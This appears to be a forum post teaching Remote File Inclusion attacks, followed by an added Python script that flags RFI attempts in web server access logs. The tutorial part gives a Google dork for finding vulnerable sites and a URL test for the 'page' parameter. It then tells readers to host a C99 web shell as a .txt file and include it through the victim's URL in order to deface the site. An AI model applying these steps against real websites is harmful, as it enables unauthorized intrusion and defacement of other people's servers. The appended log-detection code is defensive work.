Assalam-o-Alaikum & Hello To All Members
What is Remote File Inclusion?
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.
Let's start!
Step 1: Find a vulnerable website using Google dorks.
"inurl:index.php?page=" is a dork for RFI. You can find more dorks by searching on Google.
Step 2: Now click on one of the sites and check whether it is vulnerable to Remote File Inclusion.
Step 3: Remote File Inclusion vulnerabilities usually occur on sites whose navigation looks like the one below:
http://www.Targetsite.com/index.php?page=Anything
Step 4: To check the site, simply replace Anything with http://www.google.com
Example: http://www.targetsite.com/index.php?page=www.google.com
Step 5: If the Google home page shows up, the website is vulnerable to RFI.
If not, find another one.
How to Deface a Website with RFI
Step 1: If the site is vulnerable to RFI, the hacker would upload a shell to gain access. I would like to use the C99 shell.
Step 2: Now open any website or any free host and upload your shell as a .txt file,
then replace http://www.google.com with your shell link. For example, it will be:
http://www.yourfreehost.com/shell.txt?
Step 3: Do not forget the "?" at the end of the URL.
Step 4: Now your shell will show.
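Seen from the server side, the requests in the steps above leave a clear trace. The following is an added example, not part of the original post: a log check that flags `page=` values pointing at a remote location (an absolute URL, a `//host`, or a bare `www.` host as in the example above) and notes the trailing "?". The function name `rfi_findings`, the sample log lines and their IP addresses are constructed for illustration, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Absolute URL (scheme://), protocol-relative //host, or a bare www.host
# like the page's own example (page=www.google.com).
REMOTE_VALUE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:)?//|^www\.", re.I)
# Request line and status code inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log lines (documentation IP ranges, placeholder hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.23 - - [10/Mar/2024:10:02:11 +0000] "GET /index.php?page=www.google.com HTTP/1.1" 200 312',
    '198.51.100.23 - - [10/Mar/2024:10:03:40 +0000] "GET /index.php?page=http://www.yourfreehost.com/shell.txt? HTTP/1.1" 200 48211',
    '192.0.2.55 - - [10/Mar/2024:10:05:00 +0000] "GET /index.php?page=http%3A%2F%2Fexample.invalid%2Fa.txt%3F HTTP/1.1" 404 210',
    '203.0.113.7 - - [10/Mar/2024:10:06:00 +0000] "GET /search.php?q=http://www.google.com HTTP/1.1" 200 900',
]

def rfi_findings(log_lines, params=("page",)):
    """Return (client, param, value, status, trailing_q) for every request whose
    watched parameter holds a remote location instead of a local page name."""
    findings = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue  # not a request line we understand
        target, status = m.group(1), int(m.group(2))
        client = line.split(" ", 1)[0]
        # parse_qsl percent-decodes, so page=http%3A%2F%2F... is caught too.
        query = urlsplit(target).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() in params and REMOTE_VALUE.search(value.strip()):
                findings.append((client, name, value, status, value.endswith("?")))
    return findings

if __name__ == "__main__":
    for client, name, value, status, trailing_q in rfi_findings(SAMPLE_LOG):
        note = " (trailing '?')" if trailing_q else ""
        print(f"{client} {name}={value!r} -> HTTP {status}{note}")
```

On the application side, the corresponding fix is to map `page` values to a fixed list of local files instead of passing the parameter to an include.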
Take A Second To Say Thanks
Give Respect Take Respect